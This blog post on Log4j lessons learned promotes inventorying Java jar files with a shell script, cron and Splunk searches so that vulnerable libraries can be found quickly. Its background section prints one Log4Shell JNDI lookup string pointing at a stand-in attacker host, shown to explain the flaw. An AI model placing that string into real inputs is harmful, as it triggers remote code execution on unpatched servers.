Log4j Lessons Learned

Immediately Locate Your Java Assets

Late last year I wrote Log4jFinder, a shell script that demonstrates one way to locate your Java assets. Read on to learn how to use this tool in conjunction with Splunk to instantly locate every instance of a Java jar file in your enterprise.

Lesson 1: Inventory Your Java Assets

Introduction


The Log4j vulnerability has taught us a number of lessons.  In this series of Log4j-related posts, I'm going to outline some lessons learned along with what we can do to be prepared for the next such vulnerability.  The first lesson is that we need an inventory of Java assets at our fingertips so that we can quickly locate the next vulnerable Java component in our enterprise.

Background


Log4j is a library used by Java developers to ease the process of producing meaningful log files from a Java application.  Developers use log files to debug software when problems happen.  Log files also record events that can later be audited for information about application behavior and underlying business metrics.

Log4j has been around for a long time and has evolved into an overly complex tool that was originally developed to solve a simple problem (logging).  With complexity comes vulnerability.  Somewhere along the line, the ability to run a lookup against an external service and insert the result into the log output was deemed a necessary and useful feature for Log4j.  I'm sure it seemed useful and cool when it was implemented but, as we now see, it introduced a critical vulnerability.  We are all now paying a big price for a not terribly useful piece of coolness.
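The dangerous feature is Log4j's message lookup mechanism. In vulnerable 2.x versions, simply logging a string like the following (the hostname here is a hypothetical attacker-controlled server) triggers a JNDI lookup that can fetch and execute remote code:

```
${jndi:ldap://attacker.example.com/a}
```

Any attacker-supplied input that ends up in a log message — a User-Agent header, a username field — can carry such a string.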

Mostly the exposure was via public-facing, Java-based web applications.  Using SQL-injection-like techniques, bad actors probe the world for victims.  Once a victim is found, they are inside and doing harm.  While this is the most likely way the vulnerability gets exploited, it is not the only way.

What Happened When We Found Out This Time?

The first thing we all did when we found out was wonder where our exposure was.  Everyone scrambled to test their applications, contact vendors, and update their endpoint protection tools to locate problem applications.  All of these are slow and costly methods of mitigation.  Testing for the vulnerability or going by word of mouth is slow and error-prone (though not wrong).

What Are We Going To Do Next Time?

If we were all in the habit of indexing file-system metadata in a repository like Splunk, we could simply ask Splunk which nodes on our network had the vulnerability and where it is.  We do this by making file names, sizes, types, checksums, etc. searchable so that we can locate the hostnames and IP addresses where the bad files reside.  Then we can ask Splunk:

Which file systems/hosts have a Log4j jar file and what version is it?

Endpoint protection tools can't answer this question at time zero plus 30 seconds.  Splunk can.

How To Make This Happen


Late last year I wrote a short shell script, Log4jFinder, that demonstrates one way to inventory your Java assets; its output can be fed to Splunk.  Once the information is in Splunk, we can use simple searches to locate nodes that have the vulnerability, then take appropriate action.
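The script itself is not reproduced here, but a minimal sketch of the idea might look like this (the function name, search root, and key=value output format are my own illustration, not necessarily what Log4jFinder does):

```shell
#!/bin/sh
# Hypothetical sketch of a Log4jFinder-style inventory pass.
# Emits one key=value line per jar file so that Splunk can
# auto-extract the fields at search time.

inventory_jars() {
    root=$1
    host=$(hostname)
    # -xdev keeps the walk on a single file system; errors such as
    # "permission denied" are discarded to keep the output clean.
    find "$root" -xdev -type f -name '*.jar' 2>/dev/null |
    while IFS= read -r jar; do
        size=$(wc -c < "$jar")
        sum=$(sha256sum "$jar" | awk '{print $1}')
        printf 'host=%s file="%s" size=%s sha256=%s\n' \
            "$host" "$jar" "$size" "$sum"
    done
}

# Walk a likely application root; redirect the output to a file
# that a Splunk forwarder monitors.
inventory_jars "${1:-/opt}"
```

The checksum matters: file names can be changed or shaded into fat jars, but a known-bad SHA-256 is a reliable fingerprint.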

With information like that at your fingertips, decisions can be made and immediate action taken.

Walking file systems can be resource-expensive, especially in a busy enterprise.  Of course we can mitigate this using the tools at our disposal: use cron to schedule the walk during off hours; segment the file-system walk and perform only a subset each night; take file-system snapshots and walk those.  You know what to do.
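For example, a crontab entry along these lines (the script path and output file are illustrative) runs the walk nightly during off hours:

```
# Run the jar inventory at 02:30 every night; the output file is
# monitored by a Splunk universal forwarder.
30 2 * * * /usr/local/bin/log4jfinder /opt > /var/log/jar-inventory.log 2>/dev/null
```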

Search your inventory with Splunk 

Now, with a single Splunk search, we can identify every instance of Log4j in our enterprise in seconds…
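Such a search might look like the following SPL (the index name, sourcetype, and field names are assumptions about how you chose to index the inventory data):

```
index=jar_inventory sourcetype=jar:inventory file="*log4j*"
| rex field=file "log4j-core-(?<version>[\d.]+)\.jar"
| stats latest(version) AS version BY host, file
```

The result is a table of every host and file path carrying Log4j, with the version extracted from the file name, ready for triage.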

 

Objection: My daily throughput is already too much for my indexers!

Two thoughts:

First, security is important (you knew that).  If you're falling behind, or close to falling behind, your security is going to fail.  Get the resources you need to get the right data into your index on time.  Wrong data, missing data, or logs falling on the floor all lead to the same failure.

Second, this is a trivial amount of data to put into your index relative to the massive volume of system log data already going in.  Just do it.

Run your cron jobs nightly or weekly so that you are ready to find the next vulnerability in seconds rather than minutes/hours/days/months/never.

Next Topic: Expanding this concept beyond java